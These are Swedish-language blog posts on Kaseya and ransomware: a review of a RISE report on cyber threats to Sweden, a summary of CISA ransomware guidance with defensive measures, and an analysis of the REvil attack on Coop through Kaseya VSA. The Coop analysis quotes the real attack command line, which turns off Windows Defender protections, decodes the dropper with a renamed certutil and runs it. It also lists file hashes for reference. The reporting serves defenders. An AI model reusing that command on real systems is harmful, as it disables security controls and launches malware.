Taggat med: Kaseya

Ny rapport från RISE: Cyberhot mot Sverige

Research Institutes of Sweden (RISE) har släppt en ny rapport som syftar till att skapa en kunskapsöversikt för ledare och beslutsfattare om cyberhot mot Sverige och den ger även ett antal förslag på säkerhetsåtgärder.

Jag har läst rapporten och tycker att den ger en bra överblick för den som vill snabbt få en uppdatering gällande cybersäkerhetsläget. Fokus i rapporten ligger till stor del på samhällskritisk infrastruktur och statliga organisationer anser jag. Men belyser även bristen på kompetens och vikten av att genomföra utbildning av personal, responsiv incidentrapportering och att genomföra penetrationstester.

Den tar upp problemet med outsourcing och risker som kan uppstå i samband med detta. Exempel på organisationer som drabbats av ransomware såsom Coop (Kaseya) och Kalix Kommun nämns.

Rapporten är på enbart på 13 sidor och är således lättsmält. Tar även upp nya initiativ såsom Cybercampus och Nationellt cybersäkerhetscenter.

Här kan du ladda hem rapporten i sin helhet som PDF:

Cyberhot mot Sverige
RISE: Cyberhot mot Sverige

Tips: Kan även rekommendera följande två rapporter. Även om dom nu har några år på nacken.

Ransomware-attacker blir mer sofistikerade

CISA Ransomware-attacker blir mer sofistikerade

Amerikanska cybersäkerhetsmyndigheten Cybersecurity and Infrastructure Security Agency (CISA) gick för några dagar sedan ut med en varning gällande att ransomware-attacker blir allt mer sofistikerade.

Varningen skickades ut av CISA tillsammans med motsvarande myndigheter från Storbritannien och Australien. Framförallt gäller det två trender som myndigheterna ser:

 • Initial tillgång till systemen sker via RDP, phishing eller attacker som utnyttjar svagheter och brister i mjukvaror. Även ser man en uppgång där läckta användarnamn eller lösenord används för initial access, eller brute-force av lösenord/användarnamn.
 • En ökning av ransomware-as-a-service (RaaS) där cyberskurkarna köper och säljer tjänster av varandra. De blir mer professionella och fungerar mer som riktiga företag och organisationer skulle göra.

Tyvärr så fortsätter utpressarna att tjäna pengar och gör att de kan gå efter ännu större mål och göra ännu mer omfattande skador:

Every time a ransom is paid, it confirms the viability and financial attractiveness of the ransomware criminal business model.

Tidigare så genomförde ransomware-gängen vad som kallas “big-game” hunting och försökte ge sig på stora amerikanska bolag. Men FBI var aktiva och lyckades slå ner och begränsa förmågan hos de som utförde attackerna. Detta har dock fått till följd att ransomware-gängen nu ger sig på medelstora bolag och framförallt många nya branscher såsom: hälsa och sjukvård, finansiella tjänster, utbildning, mathandel, offentlig verksamhet och jurister.

Utpressningsmetoderna utvecklas också och förutom att kryptera och göra information otillgänglig, så gör man också internetaccess obrukbar samt hotar att släppa information och informera eventuella investerare och konkurrenter om intrånget.

Övrigt värt att nämna är att man ser en ökning där man ger sig på underleverantörer och leverantörer som i fallet med Coop och Kaseya. Attackerna sker ofta på helger och vid högtider då mindre personal är på plats och kan förhindra ett aktivt pågående intrång. En ökning sker även mot industrier som har värdefulla processer som måste vara uppe och fungera, samt mot managed service providers (MSPs) som hanterar många kunder.

Åtgärder för att förhindra och försvåra ransomware-attacker

Att förhindra och försvåra ransomware-attacker är ingen enkel och lätt match, utan flertalet åtgärder måste vidas. Och inte bara en gång utan det är viktigt att jobba med dessa frågor långsiktigt och systematiskt.

Denna lista har CISA släppt för att försvåra ransomware-attacker:

 • Håll all mjukvara uppdaterad med senaste säkerhetspatchar, se även över hårdvara som behöver uppdateras. Kontrollera även så att mjukvara inte har blivit eller snart kommer att bli End-of-life (EOL)
 • Kontinuerligt genomför automatisk sårbarhetsskanning. Se även över tredjepartsbiblioteket som behöver uppdateras
 • Slå på säkerhetsfunktioner och stäng av tjänster som inte används, framförallt se över RDP. Och använd VPN samt MFA (multifaktorsautentisering). Övervaka alla inloggningar över RDP och se till att det finns inställning som är satt för antalet misslyckade inloggningsförsök.
 • Träna och utbilda anställda med bl.a. phishing-medvetenhet
 • Använd multifaktorsautentisering överallt och se till att långa unika lösenord används. Att inte lösenord återanvänds
 • Om Linux används se till att SELinux, AppArmor eller SecComp används för defence in depth
 • Vid nyttjande av molnlösningar se till att backup finnes på flertalet ställen åtskilda

Rekommendationer för att försvåra för angripare att ta sig vidare i nätverken och systemen:

 • Segmentera nätverket
 • Implementera end-to-end kryptering såsom mutual Transport Layer Security (mTLS) 
 • Använd nätverksintrångsdetektering för att se avvikelser på nätverksnivå
 • Dokumentera externa anslutningar
 • Inför tidsbaserad åtkomst för administrativa konton
 • Minimera konton och behörigheter som är administrativa
 • Håll backuper offline och testa att återställa dessa
 • Använd telemetridata och inte enbart lokalt utan även från molntjänster. Såsom hur APIer nyttjas, flow logs, token logs, nedladdningar osv

Här kan du ladda ner PDF-dokumentet med samtliga rekommendationer i sin helhet:

Så genomfördes ransomware-attacken mot Coop

Så genomfördes ransomware-attacken mot Coop

Coop använder sig av en leverantör vid namn Visma Esscom (Visma Retail, Extenda) som i sin tur använder en mjukvara vid namn Kaseya. Denna mjukvara kan användas för fjärrstyrning och uppdatering av mjukvara.

Kaseya levererar en on-prem server vid namn Kaseya VSA som också går att köra som SaaS. Denna mjukvara har utsatts för intrång och troligtvis placerades en bakdörr i uppdateringsrutinen för Kaseya VSA.

Därför rekommenderar Kaseya att man helt stänger av sin Kaseya VSA-server för att angriparna tar bort övrig administrativ access till denna för att låsa ute ”riktiga administratörer”.

Bakom attacken står ransomgruppen REvil som lyckats via denna väg ta sig in på ett 40-tal kunder till Kaseya. Dessa kunder såsom Visma Esscom har i sin tur vidare mängder med kunder. Andra företag som drabbats är  Synnex Corp. och Avtex LLC.

Lösensumma ligger på ca 400000 kr för enskilda system enligt källor till Bloomberg och en annan summa som nämnts är 42M SEK till Bleepingcomputer om man vill låsa upp samtliga. Och attacker mot managed service providers (MSP) är synnerligen allvarliga då det kan drabba otroligt många organisationer, såsom fallet med SolarWinds.

Kaseya VSA skriver en fil vid namn agent.crt till katalogen c:\kworking när en uppdatering vid namn Kaseya VSA Agent Hot-fix installeras.

Hur agent.crt avkodas och resulterar i agent.exe som startas hittar du här:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Källa: Reddit

Agent.exe är i sin tur signerad av organisationen PB03 TRANSPORT LTD:

VirusTotal länk för agent.exe hittar du här, och Any.run här och pressrelease från Visma hittar du här.

SHA-256 för agent.exe: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

Och för mpsvc.dll: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd som är en av flera filer som ingår i droppern agent.exe.

Konfigurationsfil för REvil hittar du på Github här och en AHQ för Microsoft 365 här.

Uppdatering2: Ett steg som varit inte helt klart i ovan beskrivning är huruvida det var en automatisk uppdatering eller en faktiskt sårbarhet i Kaseya VSA som utnyttjas. Nya spår visar på att det var en sårbarhet som utnyttjas på grund av att VSA-servern är ansluten direkt mot internet.

Uppdatering: Det kan vara så att flertalet system är krypterade med samma publika nyckel. Det innebär att om en organisation betalar så kan flertalet dra nytt av detta: